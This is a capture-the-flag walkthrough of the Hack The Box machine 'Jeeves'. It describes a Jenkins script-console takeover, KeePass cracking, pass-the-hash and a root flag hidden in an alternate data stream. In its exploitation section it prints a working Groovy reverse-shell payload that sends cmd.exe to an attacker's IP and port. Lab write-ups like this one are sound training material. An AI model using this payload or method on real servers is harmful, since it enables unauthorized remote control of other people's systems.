JEEVES -HTB walkthrough

Dhanishtha Awasthi
5 min readJul 31, 2020

Jenkins Server Exploit.

ENUMERATION

SCAN: Nmap scan for services and versions

80 HTTP ENUMERATION

visiting website I see.

source code contains nothing juicy.

There will always be error.html in front of you whenever you search anything

Let’s do gobuster and nikto scan

Takes a while, till then we will enumerate our port 50000

PORT 50000 JETTY ENUMERATION

Nothing but a snapshot that redirects to eclipse.org. So I searched for jetty exploits and found

We can do only directory traversal. But the problem here is , we need some directory from which we can traverse back or put or attack into play.

Why not run a gobuster scan here too

Took a while and gave following results

Great we see /askjeeves on port 50000

Clicking on notification I see , a new version 2.88 is available , this means our version is lower than this

we see version 2.87

Okh so we have page , with users listed

On editing admin, we can see

Option to configure

So I changed the password and saved it, then made a login

From https://www.hackingarticles.in/exploiting-jenkins-groovy-script-console-in-multiple-ways/

I see we can exploit groovy script console. To do this without metasploit , see the way to open script console as follows. Going to manage jenkins we see

script console option

There is a script console. The path to which is script

EXPLOITATION

https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76 : using this we will get reverse shell. Our code

String host="10.10.14.14";
int port=1234;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Put nc listener ON on 1234 and running scripts.

We see we get API token of admin. I first tried to go back to administrator, using change directory command, but it was not permitted to be accessed. So getting to usual stuffs. Enumerating to get user.txt

PRIVILEGE ESCALATION

Getting system info

Hotfixes available. Enumerating more I see a kdbx key in our Document. Lets’ transfer it and crack it

We use netcat to transfer it to our machine. On our machine

After transfer is complete terminate session on your machine

CRACKING PASSWORD for kdb

We will use john to crack the key.

Trim the Name of db and pass this to hashcat

So hashcat , finally gave output . The password is moonshine1

Now we will open the database we have copied
for this we will use keepassx
sudo apt-get install keepassx

Then we open the file , it asks for password or key, select password , enter monnshine1 and open the db

Backup stuff has a hash LM:NTLM we can try to pass it. We will use pass the hash tool for this.

Okh getting root.txt

HAHAH — — TROLLS!!!!

Alternate Data Stream (ADS) is the ability of an NTFS file system (the main file system format in Windows) to store different streams of data, in addition to the default stream which is normally used for a file.

Over the years it has become a way of hidding files from unwanted users. Using dir /r : lists all files even hidden ones.

Getting root flag

Alternate way of using Alternate Data stream via powershell

ROOTED!!!

--

--